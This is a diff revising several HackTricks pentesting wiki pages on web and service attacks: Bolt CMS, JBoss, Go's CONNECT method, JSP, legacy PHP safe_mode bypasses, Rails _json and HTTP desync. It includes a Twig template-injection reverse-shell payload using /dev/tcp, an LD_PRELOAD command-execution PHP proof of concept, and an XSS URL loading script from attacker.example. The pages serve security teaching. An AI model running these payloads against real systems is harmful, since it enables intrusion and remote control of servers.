@@ -2,10 +2,10 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**Check this post:** [**https://www.errno.fr/artifactory/Attacking_Artifactory**](https://www.errno.fr/artifactory/Attacking_Artifactory)<sup>[[1]](#references)</sup>
+The linked guide collects practical Artifactory testing notes covering anonymous access, repository permissions, version-specific vulnerabilities, and post-exploitation paths. Validate every technique against the deployed Artifactory version because endpoints, defaults, and mitigations have changed over time.<sup>[[1]](#references)</sup>
 
 ## References
 
-- [1] [Artifactory Hacking guide](https://www.errno.fr/artifactory/Attacking_Artifactory)
+- [1] [Guillaume Quéré - Artifactory Hacking Guide](https://www.errno.fr/artifactory/Attacking_Artifactory)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/bolt-cms.md
+++ b/src/network-services-pentesting/pentesting-web/bolt-cms.md
@@ -2,24 +2,33 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## RCE
+## Code execution through template editing
 
-After login as admin (go to /bot lo access the login prompt), you can get RCE in Bolt CMS:
+An administrator who can edit the active theme may be able to obtain code execution by inserting a dangerous Twig expression into a rendered template. This depends on the Bolt/Twig version and on which functions or filters the installation exposes; verify the configuration rather than assuming that the example payload is supported. Bolt themes consist of Twig templates, with `index.twig` normally serving as the home-page template.<sup>[[1]](#references)</sup>
 
-- Select `Configuration` -> `View Configuration` -> `Main Configuration` or go the the URL path `/bolt/file-edit/config?file=/bolt/config.yaml`
-  - Check the value of theme
+1. Sign in to the Bolt back end, normally at `/bolt`.
+2. Select **Configuration** → **View Configuration** → **Main Configuration**, or browse to `/bolt/file-edit/config?file=/bolt/config.yaml` where that legacy editor route is enabled.
+3. Record the configured theme name.<sup>[[2]](#references)</sup>
 
-<figure><img src="../../images/image (771).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../images/image (771).png" alt="Bolt CMS configuration editor showing the active theme"><figcaption>Identifying the active Bolt theme.</figcaption></figure>
 
-- Select `File management` -> `View & edit templates`
-  - Select the theme base found in the previous (`base-2021` in this case) step and select `index.twig`
-  - In my case this is in the URL path /bolt/file-edit/themes?file=/base-2021/index.twig
-- Set your payload in this file via [template injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/index.html#twig-php), like: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
-  - And save changes
+4. Open **File management** → **View & edit templates**, select the active theme (for example, `base-2021`), and edit a template that will be rendered, such as `index.twig`. On affected versions, the route may resemble `/bolt/file-edit/themes?file=/base-2021/index.twig`.
+5. Insert an authorized [Twig server-side template injection test](../../pentesting-web/ssti-server-side-template-injection/index.html#twig-php) and save the template. For example, if the PHP `system` callback is exposed through Twig's `filter` filter, the following expression attempts a reverse shell:
 
-<figure><img src="../../images/image (948).png" alt=""><figcaption></figcaption></figure>
+   ```twig
+   {{ ['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"'] | filter('system') }}
+   ```
 
-- Clear the cache in `Maintenance` -> `Clear the cache`
-- Access again the page as a regular user, and the payload should be executed
+<figure><img src="../../images/image (948).png" alt="Bolt CMS theme editor with a Twig template selected"><figcaption>Editing a template in the active theme.</figcaption></figure>
+
+6. Select **Maintenance** → **Clear the cache**, then request the modified page. Bolt notes that configuration or template-related changes may require a cache clear before they become visible.<sup>[[2]](#references)</sup>
+
+> [!WARNING]
+> Template editing changes application files and can affect every visitor. Back up the original template, use a benign proof first, and restore the file immediately after testing.
+
+## References
+
+- [1] [Bolt documentation - Building templates](https://docs.boltcms.io/5.2/templating/building-templates)
+- [2] [Bolt documentation - Configuration settings](https://docs.boltcms.io/5.2/configuration/settings)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/buckets/README.md
+++ b/src/network-services-pentesting/pentesting-web/buckets/README.md
@@ -2,10 +2,10 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-Check this page if you want to learn more about enumerating and abusing Buckets:
+For techniques to enumerate exposed object-storage buckets and assess their permissions, see the dedicated HackTricks Cloud guide.<sup>[[1]](#references)</sup>
 
-{{#ref}}
-https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#aws---s3-unauthenticated-enum
-{{#endref}}
+## References
+
+- [1] [HackTricks Cloud - AWS S3 unauthenticated enumeration](https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#aws---s3-unauthenticated-enum)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md
+++ b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md
@@ -4,12 +4,13 @@
 
 ## What is Firebase
 
-Firebase is a Backend-as-a-Services mainly for mobile application. It is focused on removing the charge of programming the back-end providing a nice SDK as well as many other interesting things that facilitates the interaction between the application and the back-end.
+Firebase Realtime Database is a cloud-hosted NoSQL database that stores data as JSON and synchronizes changes with connected clients. Applications commonly access it through mobile and web SDKs or its REST interface, while Firebase Security Rules determine which reads and writes are allowed.<sup>[[1]](#references)</sup>
 
-Learn more about Firebase in:
+For enumeration and security-testing techniques, see the dedicated HackTricks Cloud guide.<sup>[[2]](#references)</sup>
 
-{{#ref}}
-https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html
-{{#endref}}
+## References
+
+- [1] [Firebase Documentation - Realtime Database](https://firebase.google.com/docs/database)
+- [2] [HackTricks Cloud - GCP Firebase enumeration](https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/golang.md
+++ b/src/network-services-pentesting/pentesting-web/golang.md
@@ -1,27 +1,24 @@
-# GoLang HTTP CONNECT Method
+# Go `net/http` path handling with `CONNECT`
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## CONNECT method
+## Historical `ServeMux` behavior
 
-In the Go programming language, a common practice when handling HTTP requests, specifically using the `net/http` library, is the automatic conversion of the request path into a standardized format. This process involves:
+In the referenced version of Go's `net/http` package, `ServeMux.Handler` canonicalizes the URL path for ordinary HTTP methods. It calls `cleanPath` and redirects the client when the clean result differs from the supplied path. This removes `.` and `..` segments and repeated slashes.<sup>[[1]](#references)</sup>
 
-- Paths ending with a slash (`/`) like `/flag/` are redirected to their non-slash counterpart, `/flag`.
-- Paths containing directory traversal sequences such as `/../flag` are simplified and redirected to `/flag`.
-- Paths with a trailing period as in `/flag/.` are also redirected to the clean path `/flag`.
+The historical implementation treats `CONNECT` specially and does not run its path through this canonicalization branch. Consequently, middleware or routing logic that assumes every request has already received a cleaned path may interpret a `CONNECT` target differently from another method. Whether this produces a security bypass depends on the Go version, handler registrations, proxies, and authorization checks in the application.<sup>[[1]](#references)</sup>
 
-However, an exception is observed with the use of the `CONNECT` method. Unlike other HTTP methods, `CONNECT` does not trigger the path normalization process. This behavior opens a potential avenue for accessing protected resources. By employing the `CONNECT` method alongside the `--path-as-is` option in `curl`, one can bypass the standard path normalization and potentially reach restricted areas.<sup>[[1]](#references)</sup>
-
-The following command demonstrates how to exploit this behavior:
+Use curl's `--path-as-is` option to prevent curl from normalizing the target before sending it.<sup>[[2]](#references)</sup> For example:
 
 ```bash
 curl --path-as-is -X CONNECT http://gofs.web.jctf.pro/../flag
 ```
 
-[https://github.com/golang/go/blob/9bb97ea047890e900dae04202a231685492c4b18/src/net/http/server.go\#L2354-L2364](https://github.com/golang/go/blob/9bb97ea047890e900dae04202a231685492c4b18/src/net/http/server.go#L2354-L2364)
+Compare the response with requests using a normal method and a canonical path. A different response is only an indicator; confirm that the discrepancy crosses an authorization boundary before reporting it.
 
 ## References
 
-- [1] [Go net/http source — `ServeMux.Handler`: "CONNECT requests are not canonicalized"](https://github.com/golang/go/blob/9bb97ea047890e900dae04202a231685492c4b18/src/net/http/server.go#L2354-L2364)
+- [1] [Go source - historical `ServeMux.Handler` handling of `CONNECT`](https://github.com/golang/go/blob/9bb97ea047890e900dae04202a231685492c4b18/src/net/http/server.go#L2354-L2364)
+- [2] [curl manual - `--path-as-is`](https://curl.se/docs/manpage.html#--path-as-is)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/jboss.md
+++ b/src/network-services-pentesting/pentesting-web/jboss.md
@@ -1,23 +1,29 @@
-# JBOSS
+# JBoss
 
 {{#include ../../banners/hacktricks-training.md}}
 
 ## Enumeration and Exploitation Techniques
 
-When assessing the security of web applications, certain paths like _/web-console/ServerInfo.jsp_ and _/status?full=true_ are key for revealing **server details**. For JBoss servers, paths such as _/admin-console_, _/jmx-console_, _/management_, and _/web-console_ can be crucial. These paths might allow access to **management servlets** with default credentials often set to **admin/admin**. This access facilitates interaction with MBeans through specific servlets:
+Check for exposed legacy and current management endpoints, including `/admin-console/`, `/jmx-console/`, `/management/`, `/web-console/`, `/web-console/ServerInfo.jsp`, and `/status?full=true`. The available paths vary by JBoss generation and configuration. Legacy JBoss deployments may expose an HTML JMX console or invoker servlets; Red Hat's security guidance recommends restricting these administrative access points.<sup>[[1]](#references)</sup>
 
-- For JBoss versions 6 and 7, **/web-console/Invoker** is used.
-- In JBoss 5 and earlier versions, **/invoker/JMXInvokerServlet** and **/invoker/EJBInvokerServlet** are available.
+- Test authentication rather than assuming a default password. If a management interface is exposed, enumerate its version, enabled roles, and accessible operations before attempting any authenticated checks.
+- On legacy installations, also check `/invoker/JMXInvokerServlet` and `/invoker/EJBInvokerServlet`. Their presence can expose remote management functionality and may identify an outdated deployment.<sup>[[1]](#references)</sup>
 
-Tools like **clusterd**, available at [https://github.com/hatRiot/clusterd](https://github.com/hatRiot/clusterd), and the Metasploit module `auxiliary/scanner/http/jboss_vulnscan` can be used for enumeration and potential exploitation of vulnerabilities in JBOSS services.
+The **clusterd** toolkit and Metasploit's `auxiliary/scanner/http/jboss_vulnscan` module automate checks for exposed JBoss interfaces and known deployment weaknesses.<sup>[[2]](#references)</sup><sup>[[3]](#references)</sup>
 
 ### Exploitation Resources
 
-To exploit vulnerabilities, resources such as [JexBoss](https://github.com/joaomatosf/jexboss) provide valuable tools.
+**JexBoss** can identify and validate several known JBoss and Java deserialization issues. Use active exploitation only with explicit authorization and verify the detected product/version before selecting a check.<sup>[[4]](#references)</sup>
 
 ### Finding Vulnerable Targets
 
-Google Dorking can aid in identifying vulnerable servers with a query like: `inurl:status EJInvokerServlet`
+Search engines may reveal inadvertently indexed management endpoints. For assets within the authorized scope, one possible query is `inurl:status EJInvokerServlet`.
+
+## References
+
+- [1] [Red Hat - JBoss Enterprise Application Platform 5 Security Guide](https://docs.redhat.com/en-us/documentation/jboss_enterprise_application_platform_common_criteria_certification/5/pdf/security_guide/JBoss_Enterprise_Application_Platform_Common_Criteria_Certification-5-Security_Guide-en-US.pdf)
+- [2] [GitHub - hatRiot/clusterd](https://github.com/hatRiot/clusterd)
+- [3] [Rapid7 Vulnerability & Exploit Database - JBoss vulnerability scanner](https://www.rapid7.com/db/modules/auxiliary/scanner/http/jboss_vulnscan/)
+- [4] [GitHub - joaomatosf/jexboss](https://github.com/joaomatosf/jexboss)
 
 {{#include ../../banners/hacktricks-training.md}}
-

--- a/src/network-services-pentesting/pentesting-web/jsp.md
+++ b/src/network-services-pentesting/pentesting-web/jsp.md
@@ -2,20 +2,23 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## **getContextPath** abuse
+## `getContextPath()` Link Manipulation
 
-Info from [here](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html).<sup>[[1]](#references)</sup>
+Some JSP applications prepend `request.getContextPath()` to relative resource URLs in attributes such as `src`, `href`, or `action`. If a servlet container incorporates attacker-controlled path parameters into that value and the template does not apply HTML-attribute encoding, HTML character references can transform the rendered value into a protocol-relative URL on an attacker-controlled host.<sup>[[1]](#references)</sup>
 
+```text
+http://127.0.0.1:8080/&sol;attacker.example/xss.js&num;/..;/..;/contextPathExample/test.jsp
 ```
- http://127.0.0.1:8080/&sol;rakeshmane.com/xss.js&num;/..;/..;/contextPathExample/test.jsp
-```
 
-Accessing that web you may change all the links to request the information to _**rakeshmane.com**_:
+In an affected page, the browser decodes `&sol;` as `/` and `&num;` as `#`. A generated resource URL can therefore begin with `//attacker.example/xss.js`, while the fragment hides the remaining path. If this value reaches a `<script src>` attribute, the page loads attacker-controlled JavaScript and the issue becomes XSS; other resource attributes may enable related content injection.<sup>[[1]](#references)</sup>
 
-![JSP - getContextPath abuse: Accessing that web you may change all the links to request the information to rakeshmane.com](<../../images/image (326).png>)
+![Developer tools showing page resources redirected to an external host through getContextPath manipulation](<../../images/image (326).png>)
+
+Apply context-appropriate output encoding to dynamic values placed in HTML attributes. For a URL embedded in an attribute, OWASP recommends URL encoding followed by HTML-attribute encoding; using a fixed, trusted resource base also avoids deriving an origin from request-controlled path data.<sup>[[2]](#references)</sup>
 
 ## References
 
 - [1] [JSP ContextPath Link Manipulation - XSS](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html)
+- [2] [OWASP Cross-Site Scripting Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md
@@ -1,16 +1,16 @@
-# PHP 5.2 - FOpen Exploit
+# PHP 5.2 `fopen` `safe_mode` Bypass
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)<sup>[[1]](#references)</sup>
+This historical local exploit targets a `safe_mode` restriction-bypass issue reported in PHP 5.2.0. In a shared-hosting scenario where an attacker could already execute PHP code, a crafted `srpath://` URI passed to `fopen` could write a file outside the intended location.<sup>[[1]](#references)</sup> This is not a general bypass for modern PHP because `safe_mode` and its related configuration options were removed in PHP 5.4.<sup>[[2]](#references)</sup>
 
-```php
+```bash
 php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");'
 ```
 
 ## References
 
-- [1] [PHP 5.2 - FOpen 'Safe_mode' Restriction Bypass (Maksymilian Arciemowicz)](https://www.exploit-db.com/exploits/29528)
+- [1] [Exploit Database - PHP 5.2 `fopen` `safe_mode` Restriction Bypass](https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/local/29528.txt)
+- [2] [PHP 5.4.0 Release Announcement](https://www.php.net/releases/5_4_0.php)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-

--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md
@@ -1,23 +1,43 @@
-# PHP safe_mode bypass via proc_open and custom environment Exploit
+# Legacy PHP `safe_mode` bypass via `proc_open` and a custom environment
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)<sup>[[1]](#references)</sup>
+This historical Linux technique uses the environment argument of `proc_open()` to set `LD_PRELOAD` for a child process. The preloaded shared library hooks a function invoked during process startup and runs a command outside PHP's former `safe_mode` restrictions. It requires a writable directory, an enabled `proc_open()`, and a shared library compiled for the target platform.<sup>[[1]](#references)</sup> The fifth argument to `proc_open()` supplies the child process's environment.<sup>[[2]](#references)</sup> PHP removed `safe_mode` in version 5.4, so treat this as a legacy technique rather than a general `disable_functions` bypass.<sup>[[3]](#references)</sup>
+
+The PHP portion of the original proof of concept writes the requested command to `.comm`, starts a child with the malicious library preloaded, and then reads the captured output:<sup>[[1]](#references)</sup>
 
 ```php
-<!--p $path="/var/www"; //change to your writable path $a=fopen($path."/.comm","w"); fputs($a,$_GET["c"]); fclose($a); $descriptorspec = array(  0--> array("pipe", "r"),
- 1 =&gt; array("file", $path."/output.txt","w"),
- 2 =&gt; array("file", $path."/errors.txt", "a" )
-); $cwd = '.'; $env = array('LD_PRELOAD' =&gt; $path."/a.so"); $process = proc_open('id &gt; /tmp/a', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed sleep(1); $a=fopen($path."/.comm1","r");
-echo "<strong>";
-while (!feof($a))
-{$b=fgets($a);echo $b;} fclose($a);
-?&gt;;
-</strong>
+<?php
+$path = "/var/www"; // Change to a writable path.
+
+$commandFile = fopen($path . "/.comm", "w");
+fputs($commandFile, $_GET["c"]);
+fclose($commandFile);
+
+$descriptorSpec = [
+    0 => ["pipe", "r"],
+    1 => ["file", $path . "/output.txt", "w"],
+    2 => ["file", $path . "/errors.txt", "a"],
+];
+
+$environment = ["LD_PRELOAD" => $path . "/a.so"];
+$process = proc_open("examplecommand", $descriptorSpec, $pipes, ".", $environment);
+
+sleep(1);
+$output = fopen($path . "/.comm1", "r");
+echo "<pre><b>";
+while (!feof($output)) {
+    echo fgets($output);
+}
+fclose($output);
+echo "</b></pre>";
+?>
 ```
 
 ## References
 
-- [1] [PHP disable_functions bypass techniques collection - SafeBuff blog](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
+- [1] [Bugtraq - PHP `safe_mode` can be bypassed via `proc_open()` and a custom environment](https://seclists.org/bugtraq/2008/Dec/89)
+- [2] [PHP manual - `proc_open`](https://www.php.net/manual/en/function.proc-open.php)
+- [3] [PHP - PHP 5.4.0 release announcement](https://www.php.net/releases/5_4_0.php)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/python.md
+++ b/src/network-services-pentesting/pentesting-web/python.md
@@ -2,15 +2,17 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Server using python
+## Python-specific execution probe
 
-test a possible **code execution**, using the function _str()_:
+When an input appears to be evaluated as a Python expression, a harmless call to `str()` can help confirm that the result is being executed rather than reflected verbatim. Adapt the surrounding quotes to the injection context:<sup>[[1]](#references)</sup>
 
 ```python
-"+str(True)+" #If the string True is printed, then it is vulnerable
+"+str(True)+"  # If True is printed, the expression was evaluated.
 ```
 
-### Tricks
+Do not treat this probe alone as proof that arbitrary statements or operating-system commands can run; the sink may expose only a restricted expression language.
+
+## Related techniques
 
 {{#ref}}
 ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md
@@ -23,5 +25,9 @@ test a possible **code execution**, using the function _str()_:
 {{#ref}}
 ../../pentesting-web/deserialization/README.md
 {{#endref}}
+
+## References
+
+- [1] [Python documentation - Built-in Functions: `eval()` and `str()`](https://docs.python.org/3/library/functions.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md
+++ b/src/pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md
@@ -1,11 +1,11 @@
-# SS-Leaks
+# Same-Site Leaks (SS-Leaks)
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**Check the post [https://infosec.zeyu2001.com/2023/from-xs-leaks-to-ss-leaks](https://infosec.zeyu2001.com/2023/from-xs-leaks-to-ss-leaks)**<sup>[[1]](#references)</sup>
+Same-site leaks (SS-Leaks) adapt cross-site leak techniques to HTML injection on the target site. The linked research uses nested `<object>` fallbacks, lazy loading, and responsive images to convert differences such as HTTP `200` versus `404` responses into requests to an attacker-controlled endpoint, even when `SameSite=Lax` cookies and a restrictive Content Security Policy prevent simpler XS-Leak techniques.<sup>[[1]](#references)</sup>
 
 ## References
 
-- [1] [From XS-Leaks to SS-Leaks](https://infosec.zeyu2001.com/2023/from-xs-leaks-to-ss-leaks)
+- [1] [Zeyu Zhang - From XS-Leaks to SS-Leaks](https://infosec.zeyu2001.com/2023/from-xs-leaks-to-ss-leaks)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md
+++ b/src/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md
@@ -2,7 +2,9 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-Check the posts:<sup>[[1]](#references)[[2]](#references)</sup>
+JavaServer Faces (JSF) may store view state in the client through the `javax.faces.ViewState` parameter. If the application accepts an unauthenticated serialized state without effective integrity protection, a crafted object graph can reach gadget classes on the server's classpath and lead to code execution during deserialization. Exploitability depends on the JSF implementation, its state-saving configuration, cryptographic protection, and available gadgets.<sup>[[1]](#references)</sup>
+
+The first reference explains the affected configurations and mitigations. The second walks through a practical assessment in which exposed configuration material enabled a protected ViewState to be reproduced.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ## References
 

--- a/src/pentesting-web/deserialization/ruby-_json-pollution.md
+++ b/src/pentesting-web/deserialization/ruby-_json-pollution.md
@@ -1,13 +1,12 @@
-# Ruby _json pollution
+# Ruby on Rails `_json` pollution
 
 {{#include ../../banners/hacktricks-training.md}}
 
-This is a summary from the post [https://nastystereo.com/security/rails-_json-juggling-attack.html](https://nastystereo.com/security/rails-_json-juggling-attack.html)<sup>[[1]](#references)</sup>
-
-
 ## Basic information
 
-When sending in a body some values not hashabled like an array they will be added into a new key called `_json`. However, It’s possible for an attacker to also set in the body a value called `_json` with the arbitrary values he wishes. Then, If the backend for example checks the veracity of a parameter but then also uses the `_json` parameter to perform some action, an authorisation bypass could be performed.<sup>[[1]](#references)</sup>
+When a Rails endpoint receives a JSON body whose root value is not a hash, such as an array, the parsed value is exposed under the synthetic `_json` parameter. Depending on the parser and Rails version, an attacker-supplied `_json` member in an object can create an unexpected parameter shape or collide with application logic that also trusts `_json`.<sup>[[1]](#references)</sup>
+
+This becomes a security issue when validation or authorization checks one parameter representation but a later operation consumes the polluted `_json` value. The following object illustrates attacker-controlled values placed under that reserved-looking key:<sup>[[1]](#references)</sup>
 
 ```json
 {
@@ -18,7 +17,6 @@ When sending in a body some values not hashabled like an array they will be adde
 
 ## References
 
-- [1] [The Ruby on Rails \_json Juggling Attack](https://nastystereo.com/security/rails-_json-juggling-attack.html)
+- [1] [Nasty Stereo - The Ruby on Rails `_json` juggling attack](https://nastystereo.com/security/rails-_json-juggling-attack.html)
 
 {{#include ../../banners/hacktricks-training.md}}
-

--- a/src/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md
+++ b/src/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md
@@ -1,11 +1,11 @@
-# PDF Upload - XXE and CORS bypass
+# PDF Upload: XXE and Same-Origin Policy Bypass
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**Check [https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html](https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html)**<sup>[[1]](#references)</sup>
+PDF files can contain actions, forms, and references to external resources, so an upload feature may expose more than document-rendering risk. The linked research documents historical Adobe Reader issues involving external entities and same-origin-policy bypasses. Treat its proof of concept as version-specific: reproduce it only with the affected reader and browser integration, and verify current behavior independently.<sup>[[1]](#references)</sup>
 
 ## References
 
-- [1] [Multiple PDF Vulnerabilities - Text and CORS bypass (insert-script blog)](https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html)
+- [1] [InsertScript - Multiple PDF Vulnerabilities: Text and Pictures on Steroids](https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-web/hacking-with-cookies/cookie-bomb.md
+++ b/src/pentesting-web/hacking-with-cookies/cookie-bomb.md
@@ -2,15 +2,15 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**`Cookie bomb`** involves **adding a significant number of large cookies to a domain and its subdomains targeting a user**. This action results in the victim **sending oversized HTTP requests** to the server, which are subsequently **rejected by the server**. The consequence of this is the induction of a Denial of Service (DoS) specifically targeted at a user within that domain and its subdomains.
+A cookie bomb fills a user's cookie jar with enough data that subsequent requests to a target origin carry an oversized `Cookie` header. If an intermediary or application rejects those requests, the affected user can be locked out of the site while other users remain unaffected. Broad cookie scope can extend the impact to related subdomains.<sup>[[1]](#references)[[2]](#references)</sup>
 
-A nice **example** can be seen in this write-up: [https://hackerone.com/reports/57356](https://hackerone.com/reports/57356)<sup>[[1]](#references)</sup>
+HackerOne report 57356 provides a practical example of this user-specific denial of service.<sup>[[1]](#references)</sup>
 
-And for more information, you can check this presentation: [https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers?slide=26](https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers?slide=26)<sup>[[2]](#references)</sup>
+For broader background on cookie-based attacks and browser limits, see *The Cookie Monster in Your Browsers*.<sup>[[2]](#references)</sup>
 
 ## References
 
-- [1] [HackerOne report #57356 - Cookie bomb DoS](https://hackerone.com/reports/57356)
-- [2] [The Cookie Monster in Your Browsers - speakerdeck presentation](https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers?slide=26)
+- [1] [HackerOne report 57356 - Cookie Bomb Denial of Service](https://hackerone.com/reports/57356)
+- [2] [FileDescriptor - The Cookie Monster in Your Browsers](https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers?slide=26)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-web/http-connection-contamination.md
+++ b/src/pentesting-web/http-connection-contamination.md
@@ -2,13 +2,13 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-**This is a summary of the post: [https://portswigger.net/research/http-3-connection-contamination](https://portswigger.net/research/http-3-connection-contamination)**. Check it for further details!<sup>[[1]](#references)</sup>
+This page summarizes James Kettle's research on HTTP connection contamination.<sup>[[1]](#references)</sup>
 
-Web browsers can reuse a single HTTP/2+ connection for different websites through [HTTP connection coalescing](https://daniel.haxx.se/blog/2016/08/18/http2-connection-coalescing), given shared IP addresses and a common TLS certificate. However, this can conflict with **first-request routing** in reverse-proxies, where subsequent requests are directed to the back-end determined by the first request. This misrouting can lead to security vulnerabilities, particularly when combined with wildcard TLS certificates and domains like `*.example.com`.
+Web browsers can reuse one HTTP/2 connection for different origins through **connection coalescing** when the origins resolve compatibly and the TLS certificate is valid for them. This conflicts with **first-request routing** in a reverse proxy, where the proxy selects a back end from the first request on a connection and then sends later requests on that connection to the same back end.<sup>[[1]](#references)</sup><sup>[[2]](#references)</sup>
 
-For example, if `wordpress.example.com` and `secure.example.com` are both served by the same reverse proxy and have a common wildcard certificate, a browser's connection coalescing could lead requests to `secure.example.com` to be wrongly processed by the WordPress back-end, exploiting vulnerabilities such as XSS.
+For example, suppose `wordpress.example.com` and `secure.example.com` share a reverse proxy, IP address, and wildcard certificate. If the browser coalesces their requests while the proxy pins the connection to the first host, a request intended for `secure.example.com` may reach the WordPress back end. A vulnerability there could then affect the security context of the other origin.<sup>[[1]](#references)</sup>
 
-To observe connection coalescing, Chrome's Network tab or tools like Wireshark can be used. Here's a snippet for testing:
+To observe connection coalescing, use the browser's network tools or a packet analyzer such as Wireshark. The following snippet issues sequential cross-origin requests for a controlled test:<sup>[[1]](#references)</sup>
 
 ```javascript
 fetch("//sub1.hackxor.net/", { mode: "no-cors", credentials: "include" }).then(
@@ -18,13 +18,13 @@ fetch("//sub1.hackxor.net/", { mode: "no-cors", credentials: "include" }).then(
 )
 ```
 
-The threat is currently limited due to the rarity of first-request routing and the complexity of HTTP/2. However, the proposed changes in HTTP/3, which relax the IP address match requirement, could broaden the attack surface, making servers with a wildcard certificate more vulnerable without needing a MITM attack.
+The research also explains why HTTP/3 can widen the affected configurations: connection reuse is not tied to the same TCP connection and can occur under conditions that differ from HTTP/2 coalescing.<sup>[[1]](#references)</sup>
 
-Best practices include avoiding first-request routing in reverse proxies and being cautious with wildcard TLS certificates, especially with the advent of HTTP/3. Regular testing and awareness of these complex, interconnected vulnerabilities are crucial for maintaining web security.<sup>[[1]](#references)</sup>
+Avoid first-request routing; select and validate the upstream independently for every request. Treat broad wildcard certificates and shared front ends as factors that increase impact, and test HTTP/2 and HTTP/3 paths separately.<sup>[[1]](#references)</sup>
 
 ## References
 
 - [1] [HTTP/3 connection contamination: an upcoming threat? (James Kettle)](https://portswigger.net/research/http-3-connection-contamination)
+- [2] [HTTP/2 connection coalescing (Daniel Stenberg)](https://daniel.haxx.se/blog/2016/08/18/http2-connection-coalescing/)
 
 {{#include ../banners/hacktricks-training.md}}
-

--- a/src/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md
+++ b/src/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md
@@ -2,23 +2,20 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-Browser-powered desync (aka client-side request smuggling) abuses the victim’s browser to enqueue a mis-framed request onto a shared connection so that subsequent requests are parsed out-of-sync by a downstream component. Unlike classic FE↔BE smuggling, payloads are constrained by what a browser can legally send cross-origin.<sup>[[1]](#references)[[2]](#references)</sup>
+Browser-powered desynchronization, also called client-side request smuggling, uses a victim's browser to place a misframed request on a persistent connection. A subsequent request can then be interpreted out of sync by the server. Unlike classic front-end/back-end request smuggling, the payload is constrained to syntax a browser can send.<sup>[[1]](#references)</sup><sup>[[2]](#references)</sup>
 
-Key constraints and tips
